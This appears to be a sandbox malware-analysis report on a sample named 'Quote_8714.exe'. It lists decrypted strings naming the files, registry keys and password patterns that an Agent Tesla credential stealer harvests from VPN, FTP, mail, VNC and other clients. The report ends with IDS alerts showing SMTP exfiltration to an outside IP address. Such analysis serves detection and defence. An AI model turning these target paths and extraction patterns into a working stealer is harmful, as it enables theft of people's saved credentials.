                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \accounts.xml
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \accounts.xml
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: OpenVPN
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Software\OpenVPN-GUI\configs\
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: username
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: auth-data
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: entropy
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: USERPROFILE
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \OpenVPN\config\
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: remote
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: remote
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: NordVPN
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: NordVPN
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: NordVpn.exe*
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: user.config
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: //setting[@name='Username']/value
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: //setting[@name='Password']/value
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: NordVPN
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Private Internet Access
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: %ProgramW6432%
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Private Internet Access\data
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Private Internet Access\data
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \account.json
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: .*"username":"(.*?)"
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: .*"password":"(.*?)"
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Private Internet Access
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: privateinternetaccess.com
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: FileZilla
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: APPDATA
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: APPDATA
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <Server>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <Host>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <Host>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: </Host>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <Port>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: </Port>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <User>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <User>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: </User>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: </Pass>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <Pass>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: </Pass>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: CoreFTP
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: User
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Host
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Port
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: hdfzpysvpzimorhk
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: WinSCP
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: HostName
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: UserName
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: PublicKeyFile
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: PortNumber
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: WinSCP
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ABCDEF
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Flash FXP
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: port
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: user
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: pass
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: quick.dat
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Sites.dat
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \FlashFXP\
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \FlashFXP\
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: FTP Navigator
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SystemDrive
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \FTP Navigator\Ftplist.txt
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Server
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: No Password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: User
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SmartFTP
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: APPDATA
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: WS_FTP
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: appdata
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: HOST
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: PWD=
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: PWD=
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: FtpCommander
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SystemDrive
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SystemDrive
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SystemDrive
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \cftp\Ftplist.txt
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ;Password=
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ;User=
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ;Server=
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ;Port=
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ;Port=
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ;Password=
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ;User=
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ;Anonymous=
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: FTPGetter
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \FTPGetter\servers.xml
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <server>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <server_ip>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <server_ip>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: </server_ip>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <server_port>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: </server_port>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <server_user_name>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <server_user_name>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: </server_user_name>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <server_user_password>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <server_user_password>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: </server_user_password>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: FTPGetter
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: The Bat!
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: appdata
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \The Bat!
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Account.CFN
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Account.CFN
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Becky!
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: DataDir
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Folder.lst
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Mailbox.ini
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Account
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: PassWd
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Account
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SMTPServer
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Account
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: MailAddress
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Becky!
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Outlook
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Email
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: IMAP Password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: POP3 Password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: HTTP Password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SMTP Password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Email
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Email
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Email
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: IMAP Password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: POP3 Password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: HTTP Password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SMTP Password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Server
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Windows Mail App
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Email
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Server
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SchemaId
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: pResourceElement
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: pIdentityElement
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: pPackageSid
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: pAuthenticatorElement
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: syncpassword
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: mailoutgoing
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: FoxMail
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Executable
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: FoxmailPath
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Storage\
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Storage\
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \mail
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \mail
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Accounts\Account.rec0
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Accounts\Account.rec0
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Account.stg
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Account.stg
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: POP3Host
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SMTPHost
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: IncomingServer
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Account
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: MailAddress
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: POP3Password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Opera Mail
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: opera:
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: PocoMail
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: appdata
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Pocomail\accounts.ini
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Email
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: POPPass
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SMTPPass
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SMTP
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: eM Client
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: eM Client\accounts.dat
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: eM Client
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Accounts
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: "Username":"
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: "Secret":"
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: "ProviderName":"
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: o6806642kbM7c5
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Mailbird
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SenderIdentities
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Accounts
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Mailbird\Store\Store.db
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Server_Host
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Accounts
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Email
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Username
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: EncryptedPassword
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Mailbird
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: RealVNC 4.x
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: RealVNC 3.x
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: RealVNC 4.x
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: RealVNC 3.x
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Software\ORL\WinVNC3
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: TightVNC
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: TightVNC
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: PasswordViewOnly
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: TightVNC ControlPassword
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ControlPassword
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: TigerVNC
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Software\TigerVNC\Server
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: passwd
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: passwd2
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ProgramFiles
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: passwd
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ProgramFiles
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: passwd2
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ProgramFiles
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: passwd
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ProgramFiles
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: passwd2
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: passwd
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: passwd2
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: JDownloader 2.0
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: JDownloader 2.0\cfg
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: JDownloader 2.0\cfg
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Paltalk
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: nickname
                        Source: Quote_8714.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: Quote_8714.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: System.Windows.Forms.pdb source: Quote_8714.exe, 00000000.00000002.1745088291.0000000000D07000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Windows.Forms.pdbt source: Quote_8714.exe, 00000000.00000002.1745088291.0000000000D07000.00000004.00000020.00020000.00000000.sdmp

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49735 -> 199.79.62.115:587
                        Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49735 -> 199.79.62.115:587
                        Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49735 -> 199.79.62.115:587
